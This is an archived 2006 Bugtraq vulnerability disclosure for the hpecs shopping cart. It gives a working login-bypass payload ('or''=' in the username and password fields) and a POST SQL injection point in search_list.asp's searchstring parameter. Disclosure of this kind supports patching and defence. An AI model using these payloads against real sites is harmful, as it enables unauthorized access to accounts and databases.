Bugtraq mailing list archives
hpecs shopping cart[login bypass & injection sql (post)]
From: saps.audit () gmail com
Date: 14 Nov 2006 19:31:56 -0000
vendor site:http://hpe.net/ product:hpecs shopping cart bug:injection sql risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql (post) : http://site.com/search_list.asp variables: Hpecs_Find=maingroup&searchstring='[sql] ( or just post your query in the search engine ... ) laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit () gmail com
Current thread:
- hpecs shopping cart[login bypass & injection sql (post)] saps . audit (Nov 15)